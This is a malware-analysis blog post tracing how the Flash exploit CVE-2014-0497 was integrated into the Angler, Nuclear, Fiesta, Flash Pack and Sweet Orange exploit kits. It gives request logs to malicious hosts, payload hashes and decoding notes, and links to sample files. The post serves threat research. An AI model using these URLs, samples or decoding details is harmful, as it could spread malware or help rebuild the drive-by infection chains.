2014-02-27 - Exploit Integration

CVE-2014-0497 (Flash up to integrating Exploit Kits

And here we are : first CVE-2014-xxxx exploited in blind mass attack. (I was expecting the 0322 but maybe not that easy to implement)

As spotted by EKWatcher , Angler EK is introducing today a new Flash Exploit : CVE-2014-0497 identified by Timo Hirvonen from F-Secure. This vulnerability has been found exploited in targeted attack by Kaspersky and patched 22 days ago.

That exploit is more efficient than those previously found.

The samples covered by Microsoft and Kaspersky were not working properly on Flash 12.x
But it looks like the coder of that exploit found a way to bypass the mitigation preventing the execution on branch 12.x.

Angler EK : 2014-02-26

CVE-2014-0497 successful pass in Angler EK from ru8080 team : 2014-02-26
(note : Logo and name for Angler are not "official" one)

GET http://phisoomythyxiboow .ru:8080/nf21cea1mg
200 OK (text/html)

Part of the landing after deofuscation work (credits again to EKWatcher)
giving hints on which CVE to expect.
GET http://phisoomythyxiboow .ru:8080/7Iw-u6QdLxfxRCoG1KQb6ObHh9cNwPcXhm4XQ5P4hK8INIZ4
200 OK (text/html)  2a2136743be5be61b4e929b62a7a06ea CVE-2014-0497

Flash Exploit Opened in FFDec
Piece of code showing calls that does not looks really "Anglerish".
Remains of debugging ?

GET http://phisoomythyxiboow .ru:8080/EVUjxyPGW5p_MsLcWq12Y5HwY0gkVHSUamvyuIIBd4efHGTf
200 OK (application/octet-stream) Once decoded : 664e4383fcfe183edc04247f4d018e11 (GameOver Zeus )

Side notes :

 - It's not just a XOR-ed Payload. As Bryan Burns figured out, one byte is modified.
XOR pass is not enough to get the Actual Payload.
It seems the Modified data is always the Size Of Optional Header
(sample open in PE Insider)
<edit2 2014-03-05> @malc0de told me that for IE payload the byte flip is as 0x104 instead of 0x94 </edit2>

Have no plan to search for the piece of code in charge of the modification. If you happen to work on it, I would be happy to hear about it.

-  This CVE is not being served for now in "Reveton" Angler EK instances despite landing is showing the upgrade.
Same VM, few minutes between the two pass.
Guess who is the VIP....
Edit1: 2014-02-27
It's now in Angler EK from Reveton team too.
CVE-2013-0497 in Reveton Angler EK

Files: Fiddler/sample (Owncloud via goo.gl)

Nuclear Pack : 2014-04-02

Thanks Symantec for help in confirmation.

Nuclear Pack CVE-2014-0497 Successful pass

GET http://3d0ok0ay36113q97-7.canfut .ru/
200 OK (text/html) 

NuclearPack landing.
The random Background Color is part of the obfuscation
Appeared around 2014-02-24
The js after beautify : http://pastebin.com/8SqrGU3s

Small illustration of how the bgcolor is being used

The js after deobfuscation : http://pastebin.com/dyckC40T

Here is the part we want to see :
Flash Check (which in itself gives us good indication on the bullet that might be shot)

GET http://1785839722-7.canfut .ru/1396402140.htm
200 OK (text/html)  <- CVE-2013-2551 (IE)

GET http://1785839722-7.canfut .ru/1396402140.swf
200 OK (application/x-shockwave-flash) 26e9cf4bf96d08f3c76038f80de9a14f

SWF with a lot of meaning full function name

GET http://1785839722-7.canfut .ru/f/1396402140/7
200 OK (application/octet-stream)  f6a019b1afffc51ca34c99c19fc6d350 (GameOver Zeus) Microsoft name : Win32/Peaac

Files : Fiddler Sample Swf (OwnCloud)

Fiesta :
Not long after CVE-2014-0322 integration CVE-2014-0497 is now in Fiesta, as spotted by Brad here.
Thanks to Arseny Levin from Trustwave Labs and to Symantec for confirmation.

CVE-2014-0497 successful pass in Fiesta
GET http://cdryme.in .ua/xctl5j6/?2
200 OK (text/html) http://pastebin.com/CGP6RhDV (beautified)

Landing after "Beautify" and adding deobfus comments

GET http://cdryme.in .ua/xctl5j6/?21e9da56a4a8f02341460302565a060f010150025003050d0702510a07020001;120000;38
200 OK (application/x-shockwave-flash)  CVE-2014-0497 eb343c450abd625d2119b98dcc0d62d7

Piece of CVE-2014-0497 from Fiesta

GET http://cdryme.in .ua/xctl5j6/?0c0d9b4aab02c58a59065c5f0b5907580353055f0d00045a055004575a010156
200 OK (text/html)  CVE-2013-2551

GET http://cdryme.in .ua/xctl5j6/?7b29a0345fb0c67054125902530b000d045207025552030f0251060a02530603;6
200 OK (application/octet-stream) Encoded payload is :  Miuref  fe0ffd0bbfaec31450d82c1b38ad0ffe

GET http://cdryme.in .ua/xctl5j6/?7b29a0345fb0c67054125902530b000d045207025552030f0251060a02530603;6;1
200 OK (text/html) Call Back.

Files : Fiddler/Flash/Payload (OwnCloud )

FlashPack: 2014-04-13

CVE-2014-0497 successful pass in the "windigo gang"
Flash Pack  slot 2014-04-16
(monk image is avatar from vendor on Forum - he names it : Flash EK - it's a grand'son of CritX Pack)
GET http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/allow.php
200 OK (text/html)

GET http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/js/pd.php?id=67636c6c31326e6f6e37796e6b78316674367967757a773931353935336231616131343938363336643839376234393435353930356164362e676563656b6979616665746c6572692e67656e2e7472
200 OK (text/html)

POST http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/json.php
200 OK (text/html)

Bullet chosen after the Plugin Detect : CVE-2013-2551 & CVE-2014-0497

GET http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/msie.php
200 OK (text/html) CVE-2013-2551

GET http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/flash2014.php
200 OK (text/html)

Call for exploit

GET http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/include/64a2f.swf
200 OK (application/x-shockwave-flash) ec80266e7b2f29232e25c6f0459ede6e CVE-2014-0497

Déjà vu ?  Yes. Nuclear Pack.

It seems there are traces of CVE-2013-0634 but that exploit is not called that way in Flash Pack.
It's now flash2013.php >  loadfla20013.php and another Swf.

GET http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/loadfla20014.php
200 OK (application/octet-stream) d271fcae3a8c1b345e3afdc45af9188d No surprise here for this gang : Glupteba

(you may want to read the stellar paper of Eset on Operation Windigo, this Flash EK Instance is what you get those days after Cdorked compromised server and few redirect)

Files : FlashEK_CVE-2014-0497_140416.zip (OwnCloud via Goo.gl)

Sweet Orange :
I heard of it by Sebastien Duquette from Eset on April 16th and got it working with a Windows 7 VM.
The exploit is not being pushed to Windows XP.

Add caption

GET http://raserkl15.ham .cx:9290/pda/family.php?space=282

200 OK (text/html)

GET http://raserkl15.ham .cx:9290/pda/ZgaGWW
200 OK (application/x-shockwave-flash)

CVE-2014-0497 in SWT 2014-04-16
The implementation is exactly the same as the one seen in Nuclear.

GET http://raserkl23.ham .cx:9290/action.php?ports=665&data=476&bios=4&howto=446&sports=171&lang=266&stats=765&feed=420&email=431
200 OK (application/octet-stream)

Fiddler: Here
You'll find a pcap on this post from 2014-04-20 from Malware-Traffic-Analysis.

Read more :
CVE-2014-0497 – a 0-day vulnerability - Vyacheslav Zakorzhevsky - Kaspersky - 2014-02-05
A journey to CVE-2014-0497 exploit - Chun Feng - MMPC - 2014-02-17